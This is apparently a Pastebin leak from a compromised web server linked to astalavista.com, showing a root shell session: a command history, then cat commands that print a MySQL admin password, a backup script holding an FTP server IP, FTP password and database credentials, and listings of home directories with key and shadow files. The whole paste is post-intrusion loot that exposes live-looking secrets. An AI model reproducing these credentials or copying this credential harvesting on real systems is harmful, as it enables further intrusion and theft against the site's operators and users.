  1294. mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
  1295. crontab -l
  1296. crontab -l
  1297. php -q /home/com/public_html/modifications/cronjobs/securitynews.php
  1298. /home/com/public_html/modifications/cronjobs/exploits.sh
  1299. wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
  1300. tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
  1301. cd lsws-4.0.3
  1302. sh install.sh
  1303. uptime
  1304. hdparm -tt /dev/sda
  1305. iostat
  1306. yum install iostat
  1307. iostat
  1308. whereis iostat
  1309. yjm clean all
  1310. yum clean all ; yum -y update
  1311. iostat
  1312. yum install systat
  1313. rpm -qa | grep iostat
  1314. rpm -qa | grep sysstat
  1315. rpm -qa | grep systat
  1316. dmesg -c
  1317. sysctl -p
  1318. uname -r
  1319. cd /usr/src
  1320. wget nix101.com/kernels/sstlinux.tar.gz
  1321. shutdown -r now
  1322. nano -w /boot/grub/grub.conf
  1323.  
  1324. sh-3.2# cat .my.cnf
  1325. [client]
  1326. user=da_admin
  1327. password=X9dctmRH
  1328.  
  1329. sh-3.2# cat /home/com/backup_system/backup.sh
  1330. #!/bin/sh
  1331. #####################################################################
  1332. # #
  1333. # incremental backup for astalavista.com #
  1334. # #
  1335. # author: Paulo M. Santos <paulo.santos@astalavista.com> #
  1336. # #
  1337. #####################################################################
  1338. [snip]
  1339. PROG_DIR="/home/com/backup_system";
  1340. BACKUP_DIR="/home/com/backups";
  1341. DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
  1342. # ftp for synology backup server
  1343. FTP_HOST="212.254.194.163";
  1344. FTP_PORT="21";
  1345. FTP_USER="astalavista.com";
  1346. FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
  1347. FTP_DIR="/astalavista.com";
  1348. # database
  1349. DB_HOST="localhost";
  1350. DB_USER="contrexxuser2";
  1351. DB_PASS="0fEYNZgXz1pKe";
  1352. DB_DATABASE1="com_contrexx2_live";
  1353. DB_DATABASE2="com_contrexx2";
  1354. [snip]
  1355. ftp -in $FTP_HOST $FTP_PORT <<EOF
  1356. quote USER $FTP_USER
  1357. quote PASS $FTP_PASS
  1358. cd $FTP_DIR
  1359. put $DB_FULLNAME-SQL_Dump.tar
  1360. put $BACKUP_FULLNAME-Public_HTML.tar
  1361. close
  1362. bye
  1363. EOF
  1364.  
  1365. sh-3.2# cd /home
  1366. sh-3.2# ls -la
  1367. total 120
  1368. drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
  1369. drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
  1370. drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
  1371. -rw------- 1 root root 8192 Jun 4 03:03 aquota.group
  1372. -rw------- 1 root root 8192 Jun 3 02:45 aquota.user
  1373. drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
  1374. drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
  1375. drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
  1376. drwx--x--x 10 com com 4096 Apr 28 12:40 com
  1377. drwxr-xr-x 2 root root 4096 May 17 2007 ftp
  1378. drwx------ 3 jon jon 4096 Sep 21 2007 jon
  1379. drwx------ 2 root root 16384 Sep 11 2007 lost+found
  1380. drwxr-xr-x 2 root root 4096 Sep 14 2007 my
  1381. drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
  1382. drwx------ 2 jon jon 4096 Sep 15 2007 test
  1383. drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
  1384.  
  1385. sh-3.2# cd admin
  1386. sh-3.2# ls -la
  1387. total 1735896
  1388. drwx--x--x 9 admin admin 4096 Nov 28 2007 .
  1389. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  1390. drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
  1391. drwx------ 2 admin admin 4096 Sep 28 2007 backups
  1392. -rw------- 1 admin admin 860 Sep 17 2008 .bash_history
  1393. -rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
  1394. -rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
  1395. -rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
  1396. drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
  1397. drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
  1398. drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
  1399. -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
  1400. drwx------ 2 admin admin 4096 Sep 21 2007 mail
  1401. -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
  1402. -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
  1403. -rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
  1404. -rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
  1405. drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups
  1406.  
  1407. sh-3.2# ..
  1408. sh-3.2# cd jon
  1409. sh-3.2# ls -la
  1410. total 36
  1411. drwx------ 3 jon jon 4096 Sep 21 2007 .
  1412. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  1413. -rw------- 1 jon jon 53 Sep 21 2007 .bash_history
  1414. -rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
  1415. -rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
  1416. -rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
  1417. -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
  1418. drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
  1419.  
  1420. sh-3.2# cd ..
  1421. sh-3.2# cd test
  1422. sh-3.2# ls -la
  1423. total 48
  1424. drwx------ 2 jon jon 4096 Sep 15 2007 .
  1425. drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
  1426. -rw--
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!